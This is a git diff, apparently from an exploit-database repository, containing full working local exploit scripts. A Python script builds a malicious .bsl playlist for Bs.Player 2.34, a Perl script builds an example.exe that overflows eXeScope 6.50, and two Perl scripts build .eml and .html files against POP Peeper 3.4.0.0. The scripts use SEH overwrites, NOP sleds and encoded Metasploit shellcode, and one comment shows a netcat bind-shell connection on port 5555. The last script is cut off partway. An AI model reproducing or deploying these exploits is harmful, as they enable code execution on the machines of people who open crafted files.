-"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b" -"\x42\x50\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x53\x4f\x35\x41\x33" -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57" -"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x49" -"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56" -"\x4e\x46\x43\x46\x42\x30\x5a") - - -exploit = header1 + buff + next_seh + seh + nops + shellcode + header2 - -try: - out_file = open("exploit.bsl",'w') - out_file.write(exploit) - out_file.close() - print "Exploit file created!\n" -except: - print "Error" - -# milw0rm.com [2009-03-20] +#usage: exploit.py +print "**************************************************************************" +print " Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\n" +print " Author : Nine:Situations:Group::pyrokinesis" +print " Exploited by : His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + +buff = "\x41" * 412 + +next_seh = "\xEB\x12\x41\x41" + +seh = "\xD0\x26\x58\x02" # oldskin.dll + +nops = "\x90"*19 + +header1= "\x68\x74\x74\x70\x3A\x2F\x2F\x52\x61\x77\x2D\x48\x69\x67\x68\x2E" +header2= "\x2E\x46\x4D\x2F\x6C\x69\x73\x74\x65\x6E\x2E\x70\x6C\x73\x0A\x00" + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x58\x4e\x37" +"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x51\x4b\x58" 
+"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x37\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34"
+"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
+"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x57"
+"\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x38\x42\x57\x4e\x41\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x53\x4f\x35\x41\x33"
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x49"
+"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x46\x43\x46\x42\x30\x5a")
+
+
+exploit = header1 + buff + next_seh + seh + nops + shellcode + header2
+
+try:
+ out_file = open("exploit.bsl",'w')
+ out_file.write(exploit)
+ out_file.close()
+ print "Exploit file created!\n"
+except:
+ print "Error"
+
+# milw0rm.com [2009-03-20]
diff --git a/platforms/windows/local/8270.pl b/platforms/windows/local/8270.pl
index 5276e7ecf..29735f936 100755
--- a/platforms/windows/local/8270.pl
+++ b/platforms/windows/local/8270.pl
@@ -1,57 +1,57 @@ -#!/usr/bin/perl -# -# eXeScope 6.50 Local Buffer Overflow Exploit -# -# Download eXeScope 6.50 at: -# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip -# -# Exploit by: Koshi ( heykoshi@gmail.com ) -# - -use strict; -use warnings; - -my $headers = - "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00". - "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00". - "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68". - "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F". - "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20". - "\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00". - "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88". - "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88". - "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88". - "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00". - "\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01". - "\x00"x224; - - -# win32_exec - EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com -my $shellcode = - "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23". - "\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0". - "\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3". - "\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f". - "\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4". - "\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2". - "\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba". - "\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f". - "\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56". 
- "\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9". - "\xe4"; - -my $buff0 = "A"x4148; -my $eip = "\x58\x32\x4D\x00"; # 004d3258 - eXeScope.exe -my $sled = "\x90"x20; -my $len = 6028 - length($shellcode); -my $buff1 = "A"x$len; -my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1; - -open(my $files, "> example.exe"); -binmode $files; -print $files $datas; -close($files); - -# milw0rm.com [2009-03-23] +#!/usr/bin/perl +# +# eXeScope 6.50 Local Buffer Overflow Exploit +# +# Download eXeScope 6.50 at: +# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip +# +# Exploit by: Koshi ( heykoshi@gmail.com ) +# + +use strict; +use warnings; + +my $headers = + "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00". + "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00". + "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68". + "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F". + "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20". + "\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00". + "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88". + "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88". + "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88". + "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00". + "\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01". + "\x00"x224; + + +# win32_exec - EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com +my $shellcode = + "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23". + "\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0". + "\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3". + "\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f". 
+ "\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4".
+ "\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2".
+ "\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba".
+ "\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f".
+ "\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56".
+ "\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9".
+ "\xe4";
+
+my $buff0 = "A"x4148;
+my $eip = "\x58\x32\x4D\x00"; # 004d3258 - eXeScope.exe
+my $sled = "\x90"x20;
+my $len = 6028 - length($shellcode);
+my $buff1 = "A"x$len;
+my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1;
+
+open(my $files, "> example.exe");
+binmode $files;
+print $files $datas;
+close($files);
+
+# milw0rm.com [2009-03-23]
diff --git a/platforms/windows/local/8274.pl b/platforms/windows/local/8274.pl
index 9aac3a71f..2f77d12d8 100755
--- a/platforms/windows/local/8274.pl
+++ b/platforms/windows/local/8274.pl
@@ -1,67 +1,67 @@ - # POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit -# Exploit By Stack -# Mountassif Moad -# how to use file Open message or Ctrl + O -# Select The .eml file ......>> -# BooM Calc Executed :d -# Thnx Simo- SOft - Jadi - Str0ke -# usage perl xpl.pl >>stack.eml -my $mp= -"\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a\x20\x53\x74\x61\x63\x6b".# Start first Header -"\x20\x0d\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x20\x53\x74\x61". -"\x63\x6b\x0d\x44\x41\x54\x41\x0d\x46\x52\x4f\x4d\x3a\x20". # End first Header -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk -"\xeb\x06\x90\x90". # Next_Seh -"\x4c\x51\x01\x10". # SEh ( Universal ) -"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop -"\xeb\x03\x59\xeb". # Start Scode -"\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56". -"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42". -"\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44". -"\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a". -"\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44\x42\x50\x42\x50". -"\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47\x45\x30\x4a\x57". -"\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48\x4f\x55\x42\x52". -"\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48\x41\x50\x50\x4e". -"\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c\x46\x37\x47\x50". -"\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x53". -"\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38\x4f\x45\x46\x32". -"\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54\x4b\x48\x4f\x45". -"\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58\x41\x50\x4b\x4e". -"\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43\x42\x4c\x46\x36". -"\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57\x4e\x30\x4b\x48". -"\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x46". -"\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b\x42\x50\x42\x50". -"\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33\x48\x4f\x42\x36". -"\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47\x42\x55\x4a\x46". -"\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39\x50\x4f\x4c\x38". -"\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36\x4e\x56\x43\x36". -"\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a". # End Scode -"\x0d\x54\x4f\x3a". # Start Second Header -"\x20\x53\x74\x61\x63\x6b\x20\x3a\x64\x20\x0d\x0d\x0d". 
-"\x0d"; # End Second Header -print $mp; - -# milw0rm.com [2009-03-23] + # POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit +# Exploit By Stack +# Mountassif Moad +# how to use file Open message or Ctrl + O +# Select The .eml file ......>> +# BooM Calc Executed :d +# Thnx Simo- SOft - Jadi - Str0ke +# usage perl xpl.pl >>stack.eml +my $mp= +"\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a\x20\x53\x74\x61\x63\x6b".# Start first Header +"\x20\x0d\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x20\x53\x74\x61". +"\x63\x6b\x0d\x44\x41\x54\x41\x0d\x46\x52\x4f\x4d\x3a\x20". # End first Header +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk +"\xeb\x06\x90\x90". # Next_Seh +"\x4c\x51\x01\x10". # SEh ( Universal ) +"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop +"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop +"\xeb\x03\x59\xeb". # Start Scode +"\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56". +"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42". +"\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44". +"\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a". +"\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44\x42\x50\x42\x50". +"\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47\x45\x30\x4a\x57". +"\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48\x4f\x55\x42\x52". +"\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48\x41\x50\x50\x4e". +"\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c\x46\x37\x47\x50". +"\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x53". +"\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38\x4f\x45\x46\x32". +"\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54\x4b\x48\x4f\x45". +"\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58\x41\x50\x4b\x4e". +"\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43\x42\x4c\x46\x36". +"\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57\x4e\x30\x4b\x48". +"\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x46". +"\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b\x42\x50\x42\x50". +"\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33\x48\x4f\x42\x36". +"\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47\x42\x55\x4a\x46". +"\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39\x50\x4f\x4c\x38". +"\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36\x4e\x56\x43\x36". +"\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a". # End Scode +"\x0d\x54\x4f\x3a". # Start Second Header +"\x20\x53\x74\x61\x63\x6b\x20\x3a\x64\x20\x0d\x0d\x0d". 
+"\x0d"; # End Second Header
+print $mp;
+
+# milw0rm.com [2009-03-23]
diff --git a/platforms/windows/local/8275.pl b/platforms/windows/local/8275.pl
index c74b38c51..6d9592e7c 100755
--- a/platforms/windows/local/8275.pl
+++ b/platforms/windows/local/8275.pl
@@ -1,102 +1,102 @@ -# POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit -# Exploit By Stack -# Mountassif Moad -# How to use : file > Open message or Ctrl + O -# Select The .html file ......>> -# Connect With 5555 Port -# C:\nc>nc -v 127.0.0.1 5555 -# DNS fwd/rev mismatch: localhost != stack-a4eeb2267 -# localhost [127.0.0.1] 5555 (?) open -# Microsoft Windows XP [version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# C:\Program Files\POP Peeper> -# Boom Box Connected :d -# Thnx Simo- SOft - Jadi - Str0ke -# usage perl xpl.pl >>stack.html -my $mp= -################ -"\x46\x52\x4F\x4D\x3A\x20". # First Header -################ -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk -################ -"\xeb\x06\x90\x90". # Next_Seh -"\x4c\x51\x01\x10". # SEh ( Universal ) -################ -"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop -################ -# Start Scode -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e". -"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". -"\x4e\x36\x46\x42\x46\x42\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x57". -"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58". -"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x38". -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c". -"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x38". -"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54". -"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38". -"\x49\x58\x4e\x36\x46\x52\x4e\x51\x41\x56\x43\x4c\x41\x53\x4b\x4d". -"\x46\x36\x4b\x38\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x48". -"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36". -"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46". -"\x43\x45\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57". -"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e". -"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e". -"\x48\x56\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30". 
